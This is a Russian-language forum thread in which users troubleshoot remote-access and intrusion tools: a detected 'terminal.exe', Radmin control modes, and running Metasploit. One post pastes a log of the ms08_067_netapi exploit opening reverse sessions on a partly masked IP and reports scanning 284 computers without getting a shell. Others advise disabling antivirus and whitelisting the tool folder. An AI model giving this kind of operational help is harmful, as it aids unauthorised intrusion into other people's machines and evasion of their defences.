К сожалению, терминал.экзе уже многими палится и у него есть огромный минус: он ориентирован на русскую винду.
Конечно немного не в тему, но разве нельзя терминал собрать для других версий винды. И вроде бы все что в key.reg можно через cmd забить ? А остальное может вручную ? Тогда может не будет палева ? Хотя нет, палево все таки будет, при замене файлов, там потребуется диск итд...
Все можно. Вот только надо для каждой версии собирать. Собири мне например для арабской, китайской и индийской версий.
Народ есть проблема: в реадмине не роботает виев мод, и фул контрол (заканчивается все на иницыализацыи екрана и тишна), только файл трансфер пашет. В чем может быть проблема?
offtop: Я вот заметил, что все сидят на win,я на лине(fedora10),и вот как мне запустить этот metasploit? Для него требуется Ruby(уже собрал,работает). Сканер тоже работает(проверено). Как через Ruby запустить metasploit? С Ruby сталкиваюсь первый раз, извиняйте.
качаеш версию под линь распаковываеш и запускаеш (для справки ruby это интерпритируемый язык как например python.)
18:45:55 - ms08_067_netapi [*] Launching exploit windows/smb/ms08_067_netapi... 18:45:56 - ms08_067_netapi [*] Started reverse handler 18:45:56 - ms08_067_netapi [*] Automatically detecting the target... 18:46:06 - ms08_067_netapi [*] Fingerprint: Windows XP Service Pack 2 - lang:Russian 18:46:06 - ms08_067_netapi [*] Selected Target: Windows XP SP2 Russian (NX) 18:46:07 - ms08_067_netapi [*] Triggering the vulnerability... 18:46:07 - [*] Session 3 created for **.**.192.111:4467 А выпадения консольки нету =((( сесия есть а консоли нет =((( 284 компа с них 90% "Triggering the vulnerability..." 9% Експлоит не подошол 1% "Session 1 created for..." Ниодной консоли... З.Ы. Что делать не знаю... сижу из под DSL интернета!Успеха 0...
Проблема, подскажите. Скачал с сайта www.metasploit.com файл Metasploit3.2 для винды. Установил его. Папки GUI там вообще нет, нашел файл ms08-067_netapi он вообще в другой папке. Скачал интерпретатор Ruby. Пытюсь запустить сплоит в cmd выдает ошибку: ms08_067_netapi.rb:13:in `require': no such file to load -- msf/core (LoadError) from ms08_067_netapi.rb:13 Кто знает в чем дело? бьюсь уже весь день.
Да ярлыки есть, но когда запускаю любой из них выскакивает окно доса и тут же закрывается. У меня Vista, может в этом проблема?
Доволи распространенная бага даже уже можно сказать фича. Как вариант отключи Антивирус и переустонови потом сразу добавь каталог в списки разрешенніх - чтобі антивирус не трогал + запускай от Админа
вы вродиб и не слышали о запуске из под доса..... сначала запускаем командною строку....а уже из под ее запускаем само приложение